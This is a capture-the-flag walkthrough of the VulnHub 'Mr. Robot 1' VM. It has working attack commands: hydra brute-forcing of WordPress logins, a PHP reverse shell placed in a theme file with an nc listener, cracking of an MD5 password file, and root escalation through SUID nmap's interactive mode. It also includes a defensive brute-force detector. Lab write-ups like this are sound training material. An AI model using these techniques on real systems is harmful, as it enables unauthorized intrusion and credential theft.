Mr-Robot 1

This is my writeup for the Mr. Robot 1 VM from vulnhub.com, which is based on the TV show Mr. Robot. The VM hides three keys in different locations, and the goal is to find all three; each key is progressively harder to find.
The VM isn't too difficult: there is no advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Intelligence Gathering

When we access the IP of the VM on port 80, we see what looks like a website.

Analysis

The goal is to find the three hidden keys, so let's start scanning:
I run my own recon script, which wraps nmap and nikto:

(screenshot: recon output)

Exploitation

key-1-of-3

Nikto found robots.txt:
$ curl http://__IP__/robots.txt

Content of robots.txt:
User-agent: *
fsocity.dic
key-1-of-3.txt

And that's the first key:
$ curl http://__IP__/key-1-of-3.txt
=> 073403c8a58a1f80d943455fb30724b9

key-2-of-3

Nikto also found a WordPress instance, and robots.txt gave us a dictionary, fsocity.dic. Using hydra we brute-force the username first and then the password.
First, find a valid username with fsocity.dic; the login form's "Invalid username" error tells hydra when a name does not exist:

hydra -vV -L fsocity.dic -p password __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Then find the matching password for that user with fsocity.dic; the "is incorrect" error marks a failed attempt:

hydra -vV -l elliot -P fsocity.dic __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

With these credentials we can log in to the WordPress installation.
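The defender's counterpart to the hydra steps above, added here as an example (it is not part of the original writeup): it parses Apache combined-format access log lines and flags any source that makes at least five failed POSTs to /wp-login.php inside a sliding 60-second window. The log lines, addresses and thresholds are constructed for illustration; the only WordPress behaviour assumed is that a failed login answers 200 with the error page while a successful one redirects with 302.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Apache combined-format access log (not a capture from the VM): one client
# hammering wp-login.php the way a hydra run does, beside ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jun/2015:11:20:01 +0000] "GET /robots.txt HTTP/1.1" 200 41 "-" "curl/7.38.0"
10.0.0.5 - - [18/Jun/2015:11:20:03 +0000] "POST /wp-login.php HTTP/1.0" 200 3451 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Jun/2015:11:20:03 +0000] "POST /wp-login.php HTTP/1.0" 200 3451 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Jun/2015:11:20:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Jun/2015:11:20:04 +0000] "POST /wp-login.php HTTP/1.0" 200 3451 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Jun/2015:11:20:05 +0000] "POST /wp-login.php HTTP/1.0" 200 3451 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Jun/2015:11:20:06 +0000] "POST /wp-login.php HTTP/1.0" 200 3451 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Jun/2015:11:20:07 +0000] "POST /wp-login.php HTTP/1.0" 200 3451 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Jun/2015:11:20:30 +0000] "POST /wp-login.php HTTP/1.1" 200 3451 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Jun/2015:11:22:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3451 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_login_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag sources with at least `threshold` failed POSTs to /wp-login.php inside any
    sliding window of `window_seconds`. Returns {ip: peak failures seen in one window}."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # ip -> timestamps of failed logins still inside the window
    peak = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        # Only failed login POSTs (200 + error page) count; a 302 is a successful login.
        if method != "POST" or path.split("?")[0] != "/wp-login.php" or status != 200:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # expire attempts that fell out of the window
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}
```

Run over a real access log with `detect_login_bruteforce(open("access.log"))`; the same rate-based check is what fail2ban-style tooling applies to wp-login.php.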

Placing a reverse shell

I logged in to WordPress and put an edited version of the PHP reverse shell into the theme's header.php.

(screenshot: reverse shell)

I then started a listener on port 42 on my local machine:
nc -lvp 42

Then I triggered the reverse shell by requesting the edited header.php:
curl http://__IP__/wp-content/themes/twentyfifteen/header.php

Wait for the reverse shell to connect:

Connection from __IP__ 42814 received!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 11:29:01 up 11 min,  1 user,  load average: 0.00, 0.03, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
robot    tty1                      11:21    7:36   0.07s  0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$

After poking around, I found and read /home/robot/password.raw-md5:

robot:c3fcd3d76192e4007dfb496cca67e13b

The hash is unsalted MD5 and cracks to the password:

robot:abcdefghijklmnopqrstuvwxyz

Then spawn a TTY shell using python:

python -c 'import pty; pty.spawn("/bin/sh")'

Switch to the robot user:

su robot

Read /home/robot/key-2-of-3.txt:

robot@linux:~$ ls
ls
key-2-of-3.txt	password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt

And that's key 2:
=> 822c73956184f694993bede3eb39f959

key-3-of-3

Now we need to get root. We start by searching for binaries with the SUID bit set:

find / -perm -4000 -type f 2>/dev/null

(screenshot: suid binaries found)

robot@linux:/$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

This is an old version of nmap, which still has the interactive mode. From it you can spawn a shell, and because the binary is SUID root, that shell runs as root.

nmap --interactive
nmap> !sh

Now we're root. Let's read the final key.

cat /root/key-3-of-3.txt

=> 04787ddef27c3dee1ee161b21670b4e4

Learnings

I didn't know about the interactive mode of nmap.
